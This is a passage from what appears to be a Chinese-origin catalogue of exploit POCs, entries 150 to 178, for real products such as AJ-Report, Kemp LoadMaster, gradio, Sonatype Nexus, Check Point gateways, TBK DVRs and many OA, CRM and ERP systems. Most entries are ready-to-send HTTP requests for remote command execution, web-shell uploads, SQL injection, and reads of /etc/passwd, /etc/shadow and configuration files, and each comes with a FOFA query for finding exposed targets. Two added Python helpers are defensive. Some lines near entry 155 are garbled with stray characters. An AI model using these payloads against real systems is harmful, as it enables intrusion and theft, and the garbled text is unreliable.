{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 file.php 任意文件上传9 x( f9 M! C7 Y: r# `
CVE-2024-34982/ M7 g# @6 _8 e; A
FOFA:title=="上网导航 - LyLme Spage"
( h8 ?8 ~3 H7 w/ ePOST /include/file.php HTTP/1.1
" q6 Y- ?" E: b: ?: \! t6 g5 SHost: x.x.x.x
! ^" ~% c7 P7 y! BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.00 t$ a7 V, ]+ A. P8 E2 Q
Connection: close
) M6 v7 d* `2 `5 K6 T+ r, V& gContent-Length: 232
0 ~8 r6 B( p+ R6 p& O4 WAccept: application/json, text/javascript, */*; q=0.01* X. K' m6 }$ a! s* o/ s) w( J
Accept-Encoding: gzip, deflate, br
9 T' S' ^3 t/ K" yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 \' `7 F$ j1 F6 J* D
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f4 N- K/ O1 Q6 p9 P
X-Requested-With: XMLHttpRequest3 P* H: C2 d4 ?. w( j2 S
: ]( i( A0 c0 h& `" a% y( W-----------------------------qttl7vemrsold314zg0f6 j& n6 f5 Y3 r9 Q8 l! r q
Content-Disposition: form-data; name="file"; filename="test.php") I1 t6 S0 z7 Q4 \! p
Content-Type: image/png
S0 x" R$ {" Z b: n5 M6 Z; a1 g8 a6 y9 Z
<?php phpinfo();unlink(__FILE__);?>
8 M4 |: e3 f6 d( t-----------------------------qttl7vemrsold314zg0f--7 y: r5 M- ]0 S3 `7 R( K
' a7 i6 I, t3 F: y! i: I: V& k
`! Q$ N4 j; S4 g
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php) w3 U; @* v i3 X+ ]3 j& Z( F( [
" f3 L1 S% Q2 {" A: {: H156. TBK DVR-4104/DVR-4216 操作系统命令注入
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected models:
·TBK DVR-4104
·TBK DVR-4216
The shell command is passed URL-encoded in the mdc parameter; the POC sets only the cookie uid=1, no authenticated session:
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

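The request above is the only place the injected command appears, and it is URL-encoded, so it is easy to misread in logs. The Python below is an added example for this page (not code from the original write-up, from TBK or from the CVE publisher): it URL-decodes request lines of this shape, recovers the mdc value and flags every parameter whose decoded value carries shell metacharacters. The parameter names opt/cmd/mdb/mdc and the first sample line come from the POC; the benign control lines and the metacharacter heuristic are constructed for this example.

```python
"""Triage helper for the TBK DVR device.rsp command-injection requests above.

Added example for this page; it is not code from the original write-up, from
TBK or from the CVE publisher. It URL-decodes the query string of raw HTTP
request lines and shows what the mdc parameter would hand to the shell. The
parameter names opt/cmd/mdb/mdc come from the POC; the shell-metacharacter
heuristic and the control request lines are this example's own.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request lines: the first is the POC above, the others
# are benign controls (no mdc parameter at all).
SAMPLE_REQUEST_LINES = [
    "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos"
    "&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l"
    "%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1",
    "GET /device.rsp?opt=sys&cmd=getinfo HTTP/1.1",
    "GET /login.rsp HTTP/1.1",
]

# Characters that separate or substitute commands in a POSIX shell; a value
# meant to be a single token should contain none of them.
SHELL_META = re.compile(r"[;&|`$><\n]")


def parse_request_line(request_line: str):
    """Split 'METHOD target HTTP/x' into (path, {param: [decoded values]})."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return None, {}
    parts = urlsplit(target)
    return parts.path, parse_qs(parts.query, keep_blank_values=True)


def triage(request_line: str) -> dict:
    """Describe one request line: decoded mdc value and parameters carrying shell syntax."""
    path, params = parse_request_line(request_line)
    mdc = params.get("mdc", [None])[0]
    tainted = sorted(
        name for name, values in params.items()
        if any(SHELL_META.search(v) for v in values)
    )
    return {
        "path": path,
        "mdc": mdc,
        "matches_poc_endpoint": path == "/device.rsp" and mdc is not None,
        "tainted_params": tainted,
    }


def hits(request_lines) -> list:
    """Return the triage records for lines that hit device.rsp with an mdc parameter."""
    return [r for r in map(triage, request_lines) if r["matches_poc_endpoint"]]


if __name__ == "__main__":
    for record in hits(SAMPLE_REQUEST_LINES):
        print(record["path"], "->", record["mdc"])
```

Feed it the request-line column of an access log; the decoded mdc value for the POC reads `echo; echo asrgkjh0 > /var/example.txt; ls -l /var; ...`, which is what the device would run.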
157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <jobUpload xmlns="http://rainier">
      <vcode>1</vcode>
      <subFolder></subFolder>
      <fileName>abcrce.asmx</fileName>
      <bufValue>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</bufValue>
    </jobUpload>
  </soap:Body>
</soap:Envelope>

Uploaded handler: /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 path traversal and arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> element sets the file name (path traversal segments are accepted) and the <fileFlow> element carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <UploadResume xmlns="http://tempuri.org/">
      <ip>1</ip>
      <fileName>../../../../dizxdell.aspx</fileName>
      <fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
      <tag>3</tag>
    </UploadResume>
  </soap:Body>
</soap:Envelope>

Step 2: request the uploaded file: http://x.x.x.x/dizxdell.aspx

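Entries 159 and 161 both wrap the upload in a SOAP call, with the file name in one element and the base64 file body in another, so a filter that only inspects multipart uploads, or a plain search for "<?php" in request bodies, sees nothing. The Python below is an added example for this page (not code from the write-up, from 科拓 or from 英飞达): it parses such a body, decodes the content and applies the checks a defender would want, namely traversal in the name, a server-side script extension and script markers in the decoded bytes. It also assembles the envelope the way Step 1 describes, so the decode path can be exercised end to end. The element names are taken from the two POCs; the extension list, the marker regex and the built-in sample are assumptions of this example.

```python
"""Inspect SOAP file-upload bodies of the kind used against 科拓 Webservice.asmx
(entry 161) and 英飞达 WebJobUpload.asmx (entry 159).

Added example for this page, not code from the write-up or from either vendor.
Both POCs carry the file name in <fileName> and the base64 file body in a
sibling element (<fileFlow> for 科拓, <bufValue> for 英飞达). The checks here
are this example's own: decode the body, flag '..' segments in the name, flag
server-side script extensions and look for script markers in the content.
SAMPLE_BODY is the 科拓 request body above, verbatim.
"""
import base64
import binascii
import posixpath
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
CONTENT_ELEMENTS = ("fileFlow", "bufValue")          # names used by the two POCs
SCRIPT_EXTENSIONS = (".aspx", ".asmx", ".ashx", ".asp", ".jsp", ".php")
SCRIPT_MARKERS = re.compile(rb"<%|<\?php|<script\s+runat=", re.IGNORECASE)

SAMPLE_BODY = b"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>"""


def _local(tag: str) -> str:
    """Drop the '{namespace}' prefix ElementTree prepends to element names."""
    return tag.rsplit("}", 1)[-1]


def extract_upload(body: bytes) -> dict:
    """Return the operation name, file name and decoded file content."""
    soap_body = ET.fromstring(body).find(f"{{{SOAP_NS}}}Body")
    if soap_body is None or len(soap_body) == 0:
        raise ValueError("no operation element inside soap:Body")
    op = soap_body[0]
    fields = {_local(child.tag): (child.text or "") for child in op}
    raw = next((fields[n] for n in CONTENT_ELEMENTS if n in fields), "")
    try:
        content = base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        content = b""                     # not valid base64: treat as empty
    return {"operation": _local(op.tag),
            "file_name": fields.get("fileName", ""),
            "content": content}


def assess_upload(body: bytes) -> dict:
    """Add traversal / extension / content findings to extract_upload()."""
    info = extract_upload(body)
    segments = info["file_name"].replace("\\", "/").split("/")
    ext = posixpath.splitext(segments[-1])[1].lower()
    info["path_traversal"] = ".." in segments
    info["script_extension"] = ext in SCRIPT_EXTENSIONS
    info["script_content"] = bool(SCRIPT_MARKERS.search(info["content"]))
    info["suspicious"] = (info["path_traversal"] or info["script_extension"]
                          or info["script_content"])
    return info


def build_upload_body(file_name: str, content: bytes) -> bytes:
    """Assemble an UploadResume envelope the way entry 161 describes: file name
    in <fileName>, base64 of the content in <fileFlow>. <ip> and <tag> are
    copied from the POC; the page does not document what they mean."""
    return (
        b'<?xml version="1.0" encoding="utf-8"?>'
        b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        b'<soap:Body><UploadResume xmlns="http://tempuri.org/"><ip>1</ip>'
        b"<fileName>" + escape(file_name).encode() + b"</fileName>"
        b"<fileFlow>" + base64.b64encode(content) + b"</fileFlow>"
        b"<tag>3</tag></UploadResume></soap:Body></soap:Envelope>"
    )


if __name__ == "__main__":
    print(assess_upload(SAMPLE_BODY))
```

Run against the 科拓 body above, the decoded content is a 20-byte placeholder string, so only the name-based findings fire; a real web shell body additionally sets script_content. Checking the decoded bytes matters because the POCs name the file with a script extension, but nothing stops an attacker from uploading a harmless-looking name and relying on a later rename.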
162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Uploaded file: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Uploaded file: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
The device configuration file is reachable through the following paths (the .cfg file name matches the router model):
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolic_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Then fetch the uploaded file:
GET /imc/primepush/%2e%2e/flex/12234.txt

